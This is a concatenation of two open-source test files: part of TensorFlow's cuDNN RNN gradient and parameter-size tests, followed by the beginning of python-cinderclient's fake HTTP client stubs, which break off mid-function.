self.assertAllClose(cudnn_output_h_v, output_state_v, atol=2e-5,
rtol=2e-5)
class CudnnRNNTestParamsSize(test_util.TensorFlowTestCase):
def _TestOpaqueParamsSize(self, rnn_mode, num_layers, num_units, input_size,
dtype, direction):
logging.info("Testing one lstm param size with config: %s", locals())
model = CudnnTestModel(
rnn_mode,
num_layers,
num_units,
input_size,
dtype=dtype,
direction=direction)
rnn = model.rnn
# Min param size estimate = sum(weights.size) + sum(biases.size)
min_params_size = (
np.sum([np.prod(s) for s in rnn.canonical_weight_shapes]) +
np.sum([sp[0] for sp in rnn.canonical_bias_shapes]))
opaque_params = rnn.trainable_variables[0]
with self.test_session(use_gpu=True, graph=ops.get_default_graph()):
variables.global_variables_initializer().run()
opaque_params_size_v = opaque_params.eval().size
self.assertLessEqual(min_params_size, opaque_params_size_v)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testOpaqueParamsSize(self):
test_configs = [
[4, 200, 200],
[4, 200, 300],
[4, 200, 100],
[1, 100, 200],
[2, 200, 100],
[3, 200, 400],
]
directions = [CUDNN_RNN_UNIDIRECTION, CUDNN_RNN_BIDIRECTION]
dtype_list = [dtypes.float16, dtypes.float32, dtypes.float64]
rnns = [CUDNN_LSTM, CUDNN_GRU, CUDNN_RNN_RELU, CUDNN_RNN_TANH]
for (rnn, config, dtype, direction) in itertools.product(
rnns, test_configs, dtype_list, directions):
num_layers, num_units, input_size = config
with ops.Graph().as_default():
self._TestOpaqueParamsSize(rnn, num_layers, num_units, input_size,
dtype, direction)
class CudnnRNNTestTraining(test_util.TensorFlowTestCase):
def setUp(self):
super(CudnnRNNTestTraining, self).setUp()
self._reset_rnd_gen_state = os.environ.get("TF_CUDNN_RESET_RND_GEN_STATE",
str(False))
self._rnn_use_v2 = os.environ.get("TF_CUDNN_RNN_USE_V2", "0")
def tearDown(self):
super(CudnnRNNTestTraining, self).tearDown()
os.environ["TF_CUDNN_RESET_RND_GEN_STATE"] = self._reset_rnd_gen_state
os.environ["TF_CUDNN_RNN_USE_V2"] = self._rnn_use_v2
def _ComputeNumericGrad(self, sess, y, x, delta=1e-4, step=1):
"""Compute the numeric gradient of y wrt to x.
Args:
sess: The TF session constructed with a graph containing x and y.
y: A scalar TF Tensor in the graph constructed in sess.
x: A TF Tensor in the graph constructed in sess.
delta: Gradient checker's small perturbation of x[i].
step: Only compute numerical gradients for a subset of x values.
I.e. dy/dx[i] is computed if i % step == 0.
Returns:
A Tensor of the same shape and dtype as x. If x[i] is not chosen
to compute the numerical gradient dy/x[i], the corresponding
value is set to 0.
"""
x_data = sess.run(x)
x_size = x_data.size
x_shape = x_data.shape
numeric_grad = np.zeros(x_size, dtype=x_data.dtype)
for i in range(0, x_size, step):
x_pos = x_data.copy()
if x_size == 1:
x_pos += delta
else:
x_pos.flat[i] += delta
y_pos_feed_dict = dict([(x.name, x_pos)])
y_pos = sess.run(y, feed_dict=y_pos_feed_dict)
x_neg = x_data.copy()
if x_size == 1:
x_neg -= delta
else:
x_neg.flat[i] -= delta
y_neg_feed_dict = dict([(x.name, x_neg)])
y_neg = sess.run(y, feed_dict=y_neg_feed_dict)
numeric_grad[i] = (y_pos - y_neg) / (2 * delta)
return numeric_grad.reshape(x_shape)
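# Quick sanity check of the central difference used above: for a scalar
# f(x) = x**2 at x = 3.0 with delta = 1e-4,
# (f(3.0 + 1e-4) - f(3.0 - 1e-4)) / (2 * 1e-4) = 6.0 (up to rounding),
# matching the analytic gradient f'(3.0) = 2 * 3.0; numeric_grad[i] above is
# the same quotient evaluated element-wise, with untested elements left at 0.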
def _GetShape(self, sess, inputs):
if not isinstance(inputs, collections.Iterable):
return sess.run(array_ops.shape(inputs))
else:
return sess.run([array_ops.shape(x) for x in inputs])
def _GradientCheckFp16(self, sess, y, xs, num_samples,
tolerance=1e-6, delta=1e-4):
"""Gradient check for Fp16.
Fp16 numerical gradients end up being zeros. Use a new way to check
gradients:
Given multi-variant function:
y = f(x1, x2, ... xn)
delta_y = f(x1 + delta_x1, x2+delta_x2, ..., xn+delta_xn) -
f(x1, x2, ..., xn)
= f'(x1) * delta_x1 + f'(x2) * delta_x2 + .. + f'(xn) * delta_xn
where:
delta_xi are very small disturbances.
f'(xi) is the gradient of y w.r.t xi.
The gradient check verifies the expected delta_y calculated by the above
equation is close to the actual delta_y.
Args:
sess: tf.Session object.
y: output tensor.
xs: a tensor or a list of input tensors.
num_samples: number of test samples to run.
tolerance: error tolerance.
delta: the order of magnitude of the input disturbance applied to calculate
the output change w.r.t. the inputs.
"""
sym_grads = self._ComputeSymGrads(sess, y, xs)
xs_shapes = self._GetShape(sess, xs)
x_vals = [sess.run(x) for x in xs]
for _ in range(num_samples):
delta_xs = [delta * np.random.rand(*shape.tolist())
for shape in xs_shapes]
feed_dict = {}
for x, x_val, delta_x in zip(xs, x_vals, delta_xs):
feed_dict[x] = x_val + delta_x
actual_delta_y = (float(sess.run(y, feed_dict=feed_dict)) -
float(sess.run(y)))
expected_delta_y = 0.
for sym_grad, delta_x in zip(sym_grads, delta_xs):
expected_delta_y += np.dot(
sym_grad.astype(np.float32).flatten(),
delta_x.astype(np.float32).flatten())
self.assertAllClose(expected_delta_y, actual_delta_y,
atol=tolerance, rtol=tolerance)
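# A small worked instance of the first-order check above: for y = x**2 at
# x = 3.0 with delta_x = 0.01, the symbolic gradient is 6.0, so
# expected_delta_y = 6.0 * 0.01 = 0.06, while the actual delta_y =
# 3.01**2 - 3.0**2 = 0.0601; they differ only by the second-order term
# delta_x**2, which shrinks as delta is made smaller.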
def _GradientCheck(self, sess, y, xs, tolerance=1e-6, delta=1e-4):
sym_grads = self._ComputeSymGrads(sess, y, xs)
num_grads = [self._ComputeNumericGrad(sess, y, x, delta) for x in xs]
self.assertEqual(len(sym_grads), len(num_grads))
for sym, num in zip(sym_grads, num_grads):
self.assertFalse(np.any(np.isnan(sym)))
self.assertFalse(np.any(np.isnan(num)))
self.assertAllClose(sym, num, atol=tolerance, rtol=tolerance)
def _ComputeSymGrads(self, sess, y, xs):
sym_grads_t = gradients.gradients(y, xs)
return sess.run(sym_grads_t)
def _TestOneSimpleTraining(self, rnn_mode, num_layers, num_units, input_size,
batch_size, seq_length, dir_count, dropout, dtype,
use_v2, delta, tolerance):
# Gradient checking runs two forward ops with almost the same input. Need to
# make sure the drop patterns across the two runs are the same.
logging.info("Training test with config: %s", locals())
os.environ["TF_CUDNN_RESET_RND_GEN_STATE"] = str(True)
np.random.seed(1234)
random_seed.set_random_seed(5678)
has_input_c = (rnn_mode == CUDNN_LSTM)
direction = (CUDNN_RNN_UNIDIRECTION
if dir_count == 1 else CUDNN_RNN_BIDIRECTION)
if use_v2:
os.environ["TF_CUDNN_RNN_USE_V2"] = "1"
else:
os.environ["TF_CUDNN_RNN_USE_V2"] = "0"
model = CudnnTestModel(
rnn_mode,
num_layers,
num_units,
input_size,
direction=direction,
dropout=dropout,
dtype=dtype,
training=True,
bias_initializer=init_ops.random_normal_initializer(
mean=1., dtype=dtype))
rnn = model.rnn
params = rnn.trainable_variables[0]
inputs = variables.Variable(
random_ops.random_uniform(
[seq_length, batch_size, input_size], dtype=dtype),
dtype=dtype)
input_h = variables.Variable(
random_ops.random_uniform(
[num_layers * dir_count, batch_size, num_units], dtype=dtype),
dtype=dtype)
if has_input_c:
input_c = variables.Variable(
random_ops.random_uniform(
[num_layers * dir_count, batch_size, num_units], dtype=dtype),
dtype=dtype)
initial_state = (input_h, input_c)
else:
initial_state = (input_h,)
total_sum = model.FProp(inputs, initial_state, training=True)
with self.test_session(use_gpu=True, graph=ops.get_default_graph()) as sess:
sess.run(variables.global_variables_initializer())
all_inputs = [inputs, params]
for s in initial_state:
all_inputs.append(s)
if dtype == dtypes.float16:
self._GradientCheckFp16(
sess, total_sum, all_inputs,
num_samples=FLAGS.grad_check_num_samples,
tolerance=tolerance, delta=delta)
else:
for _ in range(FLAGS.grad_check_num_samples):
# Each time choose a different set of inputs.
sess.run(variables.global_variables_initializer())
self._GradientCheck(
sess, total_sum, all_inputs,
tolerance=tolerance, delta=delta)
def _TestSimpleTrainingHelper(self, rnn_mode, test_configs):
dropouts = [0, 0.5, 1.]
v2_options = [str(False), str(True)]
for config, dropout, use_v2 in itertools.product(test_configs, dropouts,
v2_options):
dtype = config.get("dtype", dtypes.float32)
delta = config.get("delta", 1e-4)
tolerance = config.get("tolerance", 1e-6)
dir_count = config.get("dir_count", 1)
shape = config["shape"]
with ops.Graph().as_default():
self._TestOneSimpleTraining(
rnn_mode, shape["num_layers"], shape["num_units"],
shape["input_size"], shape["batch_size"], shape["seq_length"],
dir_count, dropout, dtype, use_v2, delta, tolerance)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSimpleTrainingLSTMFp64(self):
test_configs = [
{
"dtype": dtypes.float64,
"tolerance": 5e-6,
"shape": {
"num_layers": 2,
"num_units": 3,
"input_size": 4,
"batch_size": 3,
"seq_length": 4,
},
},
]
self._TestSimpleTrainingHelper(CUDNN_LSTM, test_configs)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSimpleTrainingLSTMFp32(self):
test_configs = [
{
"dtype": dtypes.float32,
"delta": 1e-4,
"tolerance": 9e-2,
"shape": {
"num_layers": 2,
"num_units": 3,
"input_size": 4,
"batch_size": 3,
"seq_length": 4,
},
},
]
self._TestSimpleTrainingHelper(CUDNN_LSTM, test_configs)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSimpleTrainingLSTMFp16(self):
test_configs = [
{
"dtype": dtypes.float16,
"delta": 1e-3,
"tolerance": 9e-2,
"shape": {
"num_layers": 2,
"num_units": 3,
"input_size": 4,
"batch_size": 3,
"seq_length": 4,
},
},
{
"dtype": dtypes.float16,
"delta": 1e-2,
"tolerance": 9e-2,
"shape": {
"num_layers": 2,
"num_units": 6,
"input_size": 8,
"batch_size": 6,
"seq_length": 4,
},
},
]
self._TestSimpleTrainingHelper(CUDNN_LSTM, test_configs)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSimpleTrainingGRUFp64(self):
test_configs = [
{
"dtype": dtypes.float64,
"tolerance": 5e-6,
"shape": {
"num_layers": 2,
"num_units": 3,
"input_size": 4,
"batch_size": 3,
"seq_length": 4,
}
},
]
self._TestSimpleTrainingHelper(CUDNN_GRU, test_configs)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSimpleTrainingGRUFp32(self):
test_configs = [
{
"dtype": dtypes.float32,
"delta": 1e-3,
"tolerance": 4e-3,
"shape": {
"num_layers": 2,
"num_units": 3,
"input_size": 4,
"batch_size": 3,
"seq_length": 4,
},
},
]
self._TestSimpleTrainingHelper(CUDNN_GRU, test_configs)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSimpleTrainingGRUFp16(self):
test_configs = [
{
"dtype": dtypes.float16,
"delta": 2e-3,
"tolerance": 6e-2,
"shape": {
"num_layers": 2,
"num_units": 3,
"input_size": 4,
"batch_size": 3,
"seq_length": 4,
},
},
]
self._TestSimpleTrainingHelper(CUDNN_GRU, test_configs)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSimpleTrainingRNNTanhFp64(self):
test_configs = [
{
"dtype": dtypes.float64,
"tolerance": 5e-6,
"shape": {
"num_layers": 2,
"num_units": 3,
"input_size": 4,
"batch_size": 3,
"seq_length": 4,
},
},
]
self._TestSimpleTrainingHelper(CUDNN_RNN_TANH, test_configs)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSimpleTrainingRNNTanhFp32(self):
test_configs = [
{
"dtype": dtypes.float32,
"delta": 1e-3,
"tolerance": 5e-3,
"shape": {
"num_layers": 2,
"num_units": 3,
"input_size": 4,
"batch_size": 3,
"seq_length": 4,
},
},
]
self._TestSimpleTrainingHelper(CUDNN_RNN_TANH, test_configs)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSimpleTrainingRNNTanhFp16(self):
test_configs = [
{
"dtype": dtypes.float16,
"delta": 1e-3,
"tolerance": 5e-2,
"shape": {
"num_layers": 2,
"num_units": 3,
"input_size": 4,
"batch_size": 3,
"seq_length": 4,
},
},
]
self._TestSimpleTrainingHelper(CUDNN_RNN_TANH, test_configs)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSimpleTrainingRNNReluFp64(self):
test_configs = [
{
"dtype": dtypes.float64,
"tolerance": 5e-6,
"shape": {
"num_layers": 2,
"num_units": 3,
"input_size": 4,
"batch_size": 3,
"seq_length": 4,
},
},
]
self._TestSimpleTrainingHelper(CUDNN_RNN_RELU, test_configs)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSimpleTrainingRNNReluFp32(self):
test_configs = [
{
"dtype": dtypes.float32,
"delta": 1e-4,
"tolerance": 3e-1,
"shape": {
"num_layers": 2,
"num_units": 3,
"input_size": 4,
"batch_size": 3,
"seq_length": 4,
},
},
]
self._TestSimpleTrainingHelper(CUDNN_RNN_RELU, test_configs)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSimpleTrainingRNNReluFp16(self):
test_configs = [
{
"dtype": dtypes.float16,
"delta": 1e-3,
"tolerance": 7e-2,
"shape": {
"num_layers": 2,
"num_units": 3,
"input_size": 4,
"batch_size": 3,
"seq_length": 4,
},
},
]
self._TestSimpleTrainingHelper(CUDNN_RNN_RELU, test_configs)
if __name__ == "__main__":
argv0 = sys.argv[0]
parser = argparse.ArgumentParser()
parser.add_argument(
"--grad_check_num_samples",
type=int,
default=5,
help="Number of samples to run for gradient check.")
FLAGS, unparsed = parser.parse_known_args()
sys.argv = [argv0] + unparsed
googletest.main()
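# Illustrative invocation (not part of the upstream test): the flag parsed
# above can be raised to make the gradient checks draw more samples, e.g.
#   python cudnn_rnn_test.py --grad_check_num_samples=10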
|
yanchen036/tensorflow
|
tensorflow/contrib/cudnn_rnn/python/kernel_tests/cudnn_rnn_test.py
|
Python
|
apache-2.0
| 57,239 | 0.006918 |
# Copyright (c) 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
try:
import urlparse
except ImportError:
import urllib.parse as urlparse
from cinderclient import client as base_client
from cinderclient.tests import fakes
import cinderclient.tests.utils as utils
from cinderclient.v2 import client
def _stub_volume(**kwargs):
volume = {
'name': None,
'description': None,
"attachments": [],
"bootable": "false",
"availability_zone": "cinder",
"created_at": "2012-08-27T00:00:00.000000",
"id": '00000000-0000-0000-0000-000000000000',
"metadata": {},
"size": 1,
"snapshot_id": None,
"status": "available",
"volume_type": "None",
"links": [
{
"href": "http://localhost/v2/fake/volumes/1234",
"rel": "self"
},
{
"href": "http://localhost/fake/volumes/1234",
"rel": "bookmark"
}
],
}
volume.update(kwargs)
return volume
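# Illustrative use of the override pattern above (not part of the upstream
# fakes): any field of the stub can be replaced per call, e.g.
#   _stub_volume(status='in-use', size=2)
# returns the same dict with those two keys overridden.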
def _stub_snapshot(**kwargs):
snapshot = {
"created_at": "2012-08-28T16:30:31.000000",
"display_description": None,
"display_name": None,
"id": '11111111-1111-1111-1111-111111111111',
"size": 1,
"status": "available",
"volume_id": '00000000-0000-0000-0000-000000000000',
}
snapshot.update(kwargs)
return snapshot
def _self_href(base_uri, tenant_id, backup_id):
return '%s/v2/%s/backups/%s' % (base_uri, tenant_id, backup_id)
def _bookmark_href(base_uri, tenant_id, backup_id):
return '%s/%s/backups/%s' % (base_uri, tenant_id, backup_id)
def _stub_backup_full(id, base_uri, tenant_id):
return {
'id': id,
'name': 'backup',
'description': 'nightly backup',
'volume_id': '712f4980-5ac1-41e5-9383-390aa7c9f58b',
'container': 'volumebackups',
'object_count': 220,
'size': 10,
'availability_zone': 'az1',
'created_at': '2013-04-12T08:16:37.000000',
'status': 'available',
'links': [
{
'href': _self_href(base_uri, tenant_id, id),
'rel': 'self'
},
{
'href': _bookmark_href(base_uri, tenant_id, id),
'rel': 'bookmark'
}
]
}
def _stub_backup(id, base_uri, tenant_id):
return {
'id': id,
'name': 'backup',
'links': [
{
'href': _self_href(base_uri, tenant_id, id),
'rel': 'self'
},
{
'href': _bookmark_href(base_uri, tenant_id, id),
'rel': 'bookmark'
}
]
}
def _stub_qos_full(id, base_uri, tenant_id, name=None, specs=None):
if not name:
name = 'fake-name'
if not specs:
specs = {}
return {
'qos_specs': {
'id': id,
'name': name,
'consumer': 'back-end',
'specs': specs,
},
'links': {
'href': _bookmark_href(base_uri, tenant_id, id),
'rel': 'bookmark'
}
}
def _stub_qos_associates(id, name):
return {
'assoications_type': 'volume_type',
'name': name,
'id': id,
}
def _stub_restore():
return {'volume_id': '712f4980-5ac1-41e5-9383-390aa7c9f58b'}
def _stub_transfer_full(id, base_uri, tenant_id):
return {
'id': id,
'name': 'transfer',
'volume_id': '8c05f861-6052-4df6-b3e0-0aebfbe686cc',
'created_at': '2013-04-12T08:16:37.000000',
'auth_key': '123456',
'links': [
{
'href': _self_href(base_uri, tenant_id, id),
'rel': 'self'
},
{
'href': _bookmark_href(base_uri, tenant_id, id),
'rel': 'bookmark'
}
]
}
def _stub_transfer(id, base_uri, tenant_id):
return {
'id': id,
'name': 'transfer',
'volume_id': '8c05f861-6052-4df6-b3e0-0aebfbe686cc',
'links': [
{
'href': _self_href(base_uri, tenant_id, id),
'rel': 'self'
},
{
'href': _bookmark_href(base_uri, tenant_id, id),
'rel': 'bookmark'
}
]
}
def _stub_extend(id, new_size):
return {'volume_id': '712f4980-5ac1-41e5-9383-390aa7c9f58b'}
class FakeClient(fakes.FakeClient, client.Client):
def __init__(self, *args, **kwargs):
client.Client.__init__(self, 'username', 'password',
'project_id', 'auth_url',
extensions=kwargs.get('extensions'))
self.client = FakeHTTPClient(**kwargs)
def get_volume_api_version_from_endpoint(self):
return self.client.get_volume_api_version_from_endpoint()
class FakeHTTPClient(base_client.HTTPClient):
def __init__(self, **kwargs):
self.username = 'username'
self.password = 'password'
self.auth_url = 'auth_url'
self.callstack = []
self.management_url = 'http://10.0.2.15:8776/v2/fake'
def _cs_request(self, url, method, **kwargs):
# Check that certain things are called correctly
if method in ['GET', 'DELETE']:
assert 'body' not in kwargs
elif method == 'PUT':
assert 'body' in kwargs
# Call the method
args = urlparse.parse_qsl(urlparse.urlparse(url)[4])
kwargs.update(args)
munged_url = url.rsplit('?', 1)[0]
munged_url = munged_url.strip('/').replace('/', '_').replace('.', '_')
munged_url = munged_url.replace('-', '_')
callback = "%s_%s" % (method.lower(), munged_url)
if not hasattr(self, callback):
raise AssertionError('Called unknown API method: %s %s, '
'expected fakes method name: %s' %
(method, url, callback))
# Note the call
self.callstack.append((method, url, kwargs.get('body', None)))
status, headers, body = getattr(self, callback)(**kwargs)
r = utils.TestResponse({
"status_code": status,
"text": body,
"headers": headers,
})
return r, body
def get_volume_api_version_from_endpoint(self):
magic_tuple = urlparse.urlsplit(self.management_url)
scheme, netloc, path, query, frag = magic_tuple
return path.lstrip('/').split('/')[0][1:]
#
# Snapshots
#
def get_snapshots_detail(self, **kw):
return (200, {}, {'snapshots': [
_stub_snapshot(),
]})
def get_snapshots_1234(self, **kw):
return (200, {}, {'snapshot': _stub_snapshot(id='1234')})
def put_snapshots_1234(self, **kw):
snapshot = _stub_snapshot(id='1234')
snapshot.update(kw['body']['snapshot'])
return (200, {}, {'snapshot': snapshot})
def post_snapshots_1234_action(self, body, **kw):
_body = None
resp = 202
        assert len(list(body.keys())) == 1
        action = list(body.keys())[0]
if action == 'os-reset_status':
assert 'status' in body['os-reset_status']
elif action == 'os-update_snapshot_status':
assert 'status' in body['os-update_snapshot_status']
else:
raise AssertionError('Unexpected action: %s' % action)
return (resp, {}, _body)
#
# Volumes
#
def put_volumes_1234(self, **kw):
volume = _stub_volume(id='1234')
volume.update(kw['body']['volume'])
return (200, {}, {'volume': volume})
def get_volumes(self, **kw):
return (200, {}, {"volumes": [
{'id': 1234, 'name': 'sample-volume'},
{'id': 5678, 'name': 'sample-volume2'}
]})
# TODO(jdg): This will need to change
# at the very least it's not complete
def get_volumes_detail(self, **kw):
return (200, {}, {"volumes": [
{'id': 1234,
'name': 'sample-volume',
'attachments': [{'server_id': 1234}]},
]})
def get_volumes_1234(self, **kw):
r = {'volume': self.get_volumes_detail()[2]['volumes'][0]}
return (200, {}, r)
def get_volumes_1234_encryption(self, **kw):
r = {'encryption_key_id': 'id'}
return (200, {}, r)
def post_volumes_1234_action(self, body, **kw):
_body = None
resp = 202
assert len(list(body.keys())) == 1
action = list(body.keys())[0]
if action == 'os-attach':
assert list(body[action].keys()) == ['instance_uuid', 'mountpoint']
elif action == 'os-detach':
assert body[action] is None
elif action == 'os-reserve':
assert body[action] is None
elif action == 'os-unreserve':
assert body[action] is None
elif action == 'os-initialize_connection':
assert list(body[action].keys()) == ['connector']
return (202, {}, {'connection_info': 'foos'})
elif action == 'os-terminate_connection':
assert list(body[action].keys()) == ['connector']
elif action == 'os-begin_detaching':
assert body[action] is None
elif action == 'os-roll_detaching':
assert body[action] is None
elif action == 'os-reset_status':
assert 'status' in body[action]
elif action == 'os-extend':
            assert list(body[action].keys()) == ['new_size']
elif action == 'os-migrate_volume':
assert 'host' in body[action]
assert 'force_host_copy' in body[action]
else:
raise AssertionError("Unexpected action: %s" % action)
return (resp, {}, _body)
def post_volumes(self, **kw):
return (202, {}, {'volume': {}})
def delete_volumes_1234(self, **kw):
return (202, {}, None)
#
# Quotas
#
def get_os_quota_sets_test(self, **kw):
return (200, {}, {'quota_set': {
'tenant_id': 'test',
'metadata_items': [],
'volumes': 1,
'snapshots': 1,
'gigabytes': 1}})
def get_os_quota_sets_test_defaults(self):
return (200, {}, {'quota_set': {
'tenant_id': 'test',
'metadata_items': [],
'volumes': 1,
'snapshots': 1,
'gigabytes': 1}})
def put_os_quota_sets_test(self, body, **kw):
assert list(body.keys()) == ['quota_set']
fakes.assert_has_keys(body['quota_set'],
required=['tenant_id'])
return (200, {}, {'quota_set': {
'tenant_id': 'test',
'metadata_items': [],
'volumes': 2,
'snapshots': 2,
'gigabytes': 1}})
#
# Quota Classes
#
def get_os_quota_class_sets_test(self, **kw):
return (200, {}, {'quota_class_set': {
'class_name': 'test',
'metadata_items': [],
'volumes': 1,
'snapshots': 1,
'gigabytes': 1}})
def put_os_quota_class_sets_test(self, body, **kw):
assert list(body.keys()) == ['quota_class_set']
fakes.assert_has_keys(body['quota_class_set'],
required=['class_name'])
return (200, {}, {'quota_class_set': {
'class_name': 'test',
'metadata_items': [],
'volumes': 2,
'snapshots': 2,
'gigabytes': 1}})
#
# VolumeTypes
#
def get_types(self, **kw):
return (200, {}, {
'volume_types': [{'id': 1,
'name': 'test-type-1',
'extra_specs': {}},
{'id': 2,
'name': 'test-type-2',
'extra_specs': {}}]})
def get_types_1(self, **kw):
return (200, {}, {'volume_type': {'id': 1,
'name': 'test-type-1',
'extra_specs': {}}})
def get_types_2(self, **kw):
return (200, {}, {'volume_type': {'id': 2,
'name': 'test-type-2',
'extra_specs': {}}})
def post_types(self, body, **kw):
return (202, {}, {'volume_type': {'id': 3,
'name': 'test-type-3',
'extra_specs': {}}})
def post_types_1_extra_specs(self, body, **kw):
assert list(body.keys()) == ['extra_specs']
return (200, {}, {'extra_specs': {'k': 'v'}})
def delete_types_1_extra_specs_k(self, **kw):
        return (204, {}, None)
def delete_types_1(self, **kw):
return (202, {}, None)
#
# VolumeEncryptionTypes
#
def get_types_1_encryption(self, **kw):
return (200, {}, {'id': 1, 'volume_type_id': 1, 'provider': 'test',
'cipher': 'test', 'key_size': 1,
'control_location': 'front'})
def get_types_2_encryption(self, **kw):
return (200, {}, {})
def post_types_2_encryption(self, body, **kw):
return (200, {}, {'encryption': {}})
def put_types_1_encryption_1(self, body, **kw):
return (200, {}, {})
#
# Set/Unset metadata
#
def delete_volumes_1234_metadata_test_key(self, **kw):
return (204, {}, None)
def delete_volumes_1234_metadata_key1(self, **kw):
return (204, {}, None)
def delete_volumes_1234_metadata_key2(self, **kw):
return (204, {}, None)
def post_volumes_1234_metadata(self, **kw):
return (204, {}, {'metadata': {'test_key': 'test_value'}})
#
# List all extensions
#
def get_extensions(self, **kw):
exts = [
{
"alias": "FAKE-1",
"description": "Fake extension number 1",
"links": [],
"name": "Fake1",
"namespace": ("http://docs.openstack.org/"
"/ext/fake1/api/v1.1"),
"updated": "2011-06-09T00:00:00+00:00"
},
{
"alias": "FAKE-2",
"description": "Fake extension number 2",
"links": [],
"name": "Fake2",
"namespace": ("http://docs.openstack.org/"
"/ext/fake1/api/v1.1"),
"updated": "2011-06-09T00:00:00+00:00"
},
]
return (200, {}, {"extensions": exts, })
#
# VolumeBackups
#
def get_backups_76a17945_3c6f_435c_975b_b5685db10b62(self, **kw):
base_uri = 'http://localhost:8776'
tenant_id = '0fa851f6668144cf9cd8c8419c1646c1'
backup1 = '76a17945-3c6f-435c-975b-b5685db10b62'
return (200, {},
{'backup': _stub_backup_full(backup1, base_uri, tenant_id)})
def get_backups_detail(self, **kw):
base_uri = 'http://localhost:8776'
tenant_id = '0fa851f6668144cf9cd8c8419c1646c1'
backup1 = '76a17945-3c6f-435c-975b-b5685db10b62'
backup2 = 'd09534c6-08b8-4441-9e87-8976f3a8f699'
return (200, {},
{'backups': [
_stub_backup_full(backup1, base_uri, tenant_id),
_stub_backup_full(backup2, base_uri, tenant_id)]})
def delete_backups_76a17945_3c6f_435c_975b_b5685db10b62(self, **kw):
return (202, {}, None)
def post_backups(self, **kw):
base_uri = 'http://localhost:8776'
tenant_id = '0fa851f6668144cf9cd8c8419c1646c1'
backup1 = '76a17945-3c6f-435c-975b-b5685db10b62'
return (202, {},
{'backup': _stub_backup(backup1, base_uri, tenant_id)})
def post_backups_76a17945_3c6f_435c_975b_b5685db10b62_restore(self, **kw):
return (200, {},
{'restore': _stub_restore()})
#
# QoSSpecs
#
def get_qos_specs_1B6B6A04_A927_4AEB_810B_B7BAAD49F57C(self, **kw):
base_uri = 'http://localhost:8776'
tenant_id = '0fa851f6668144cf9cd8c8419c1646c1'
qos_id1 = '1B6B6A04-A927-4AEB-810B-B7BAAD49F57C'
return (200, {},
_stub_qos_full(qos_id1, base_uri, tenant_id))
def get_qos_specs(self, **kw):
base_uri = 'http://localhost:8776'
tenant_id = '0fa851f6668144cf9cd8c8419c1646c1'
qos_id1 = '1B6B6A04-A927-4AEB-810B-B7BAAD49F57C'
qos_id2 = '0FD8DD14-A396-4E55-9573-1FE59042E95B'
return (200, {},
{'qos_specs': [
_stub_qos_full(qos_id1, base_uri, tenant_id, 'name-1'),
_stub_qos_full(qos_id2, base_uri, tenant_id)]})
def post_qos_specs(self, **kw):
base_uri = 'http://localhost:8776'
tenant_id = '0fa851f6668144cf9cd8c8419c1646c1'
qos_id = '1B6B6A04-A927-4AEB-810B-B7BAAD49F57C'
qos_name = 'qos-name'
return (202, {},
_stub_qos_full(qos_id, base_uri, tenant_id, qos_name))
def put_qos_specs_1B6B6A04_A927_4AEB_810B_B7BAAD49F57C(self, **kw):
return (202, {}, None)
def put_qos_specs_1B6B6A04_A927_4AEB_810B_B7BAAD49F57C_delete_keys(
self, **kw):
return (202, {}, None)
def delete_qos_specs_1B6B6A04_A927_4AEB_810B_B7BAAD49F57C(self, **kw):
return (202, {}, None)
def get_qos_specs_1B6B6A04_A927_4AEB_810B_B7BAAD49F57C_associations(
self, **kw):
type_id1 = '4230B13A-7A37-4E84-B777-EFBA6FCEE4FF'
type_id2 = '4230B13A-AB37-4E84-B777-EFBA6FCEE4FF'
type_name1 = 'type1'
type_name2 = 'type2'
return (202, {},
{'qos_associations': [
_stub_qos_associates(type_id1, type_name1),
_stub_qos_associates(type_id2, type_name2)]})
def get_qos_specs_1B6B6A04_A927_4AEB_810B_B7BAAD49F57C_associate(
self, **kw):
return (202, {}, None)
def get_qos_specs_1B6B6A04_A927_4AEB_810B_B7BAAD49F57C_disassociate(
self, **kw):
return (202, {}, None)
def get_qos_specs_1B6B6A04_A927_4AEB_810B_B7BAAD49F57C_disassociate_all(
self, **kw):
return (202, {}, None)
#
#
# VolumeTransfers
#
def get_os_volume_transfer_5678(self, **kw):
base_uri = 'http://localhost:8776'
tenant_id = '0fa851f6668144cf9cd8c8419c1646c1'
transfer1 = '5678'
return (200, {},
{'transfer':
_stub_transfer_full(transfer1, base_uri, tenant_id)})
def get_os_volume_transfer_detail(self, **kw):
base_uri = 'http://localhost:8776'
tenant_id = '0fa851f6668144cf9cd8c8419c1646c1'
transfer1 = '5678'
transfer2 = 'f625ec3e-13dd-4498-a22a-50afd534cc41'
return (200, {},
{'transfers': [
_stub_transfer_full(transfer1, base_uri, tenant_id),
_stub_transfer_full(transfer2, base_uri, tenant_id)]})
def delete_os_volume_transfer_5678(self, **kw):
return (202, {}, None)
def post_os_volume_transfer(self, **kw):
base_uri = 'http://localhost:8776'
tenant_id = '0fa851f6668144cf9cd8c8419c1646c1'
transfer1 = '5678'
return (202, {},
{'transfer': _stub_transfer(transfer1, base_uri, tenant_id)})
def post_os_volume_transfer_5678_accept(self, **kw):
base_uri = 'http://localhost:8776'
tenant_id = '0fa851f6668144cf9cd8c8419c1646c1'
transfer1 = '5678'
return (200, {},
